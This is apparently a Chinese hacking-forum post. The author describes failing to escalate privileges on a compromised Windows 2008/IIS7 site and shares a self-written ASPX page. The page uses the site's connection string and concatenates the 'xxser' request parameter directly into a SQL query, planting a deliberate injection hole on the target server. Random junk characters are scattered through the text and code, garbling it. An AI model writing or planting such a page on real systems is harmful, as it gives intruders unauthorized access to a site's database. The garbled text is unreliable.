昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。6 m( p4 I, o+ Q( l1 q
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
) e' J. o+ D' n- o O7 e. t7 g, c7 P代码量不多,自己写个拉倒了。烦死了。) X# W* ]; z5 W6 U: u$ `" @
9 ^* D9 h' Z- e% N9 m+ Q. E* l. j5 | |' I V
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">3 R9 e$ { Q% c5 F1 K: Q0 d: N: Y
<html xmlns="http://www.w3.org/1999/xhtml">8 j% }4 o2 n4 D6 ^0 s
<head runat="server">" i" f+ _ C. C. ^) X+ t
<title>暗影aspx构造注射专用页面</title>3 o' R: ^. N( U* L
</head>
0 }) y: [% E2 R' a<body>
, E% e' [& ^! c% F% Y <form id="form1" runat="server">0 ?+ |1 D4 B& m% B, [& A `4 e, j8 r: y
<div>6 |% h' t2 L6 b1 U0 b
<script language="c#" runat="server">+ u; ]/ s, }* E: j# ?2 P X F/ s
3 v1 ?: |+ [6 X' Y
void page_init(object sender, EventArgs e)( v/ |) A0 T! ^+ ~* L
{3 U; t# M2 `3 j9 e4 x9 x
# |5 `$ K4 T! p
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();. j3 E8 s9 x7 h' {1 D: u! w
( w5 j r D, j( @6 q
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();( @+ m" z9 g8 i) E4 @
conn.Open();4 K0 P ^* s) i( |# [8 t9 E4 y) }
# W1 [2 `0 l9 r( H string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
; v. N7 P* \, P& s/ J- g
% k; T" j" q& k' }8 N System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
5 W/ }/ n" {: \) X' D int x = command.ExecuteNonQuery();
# G1 [2 L. w+ M; {# t1 S Response.Write(i+"\n");! ]8 s0 T* b5 W# k6 s
Response.Write(x);3 D, Z0 V7 D1 ]
conn.Close();. F! M2 b( k$ x- y. [4 v
}
% N# y$ Q- m: X- `
- \% \! ~3 X+ G7 f$ v7 w7 j9 f3 w5 e </script> R$ H; M( N0 R
</div>
# s) B; e: X) f* C </form>8 S0 H: z, o" P" F5 `
</body>6 Q7 S6 ^* |5 T
</html>
5 ]2 V! R3 A7 C& l2 D, p |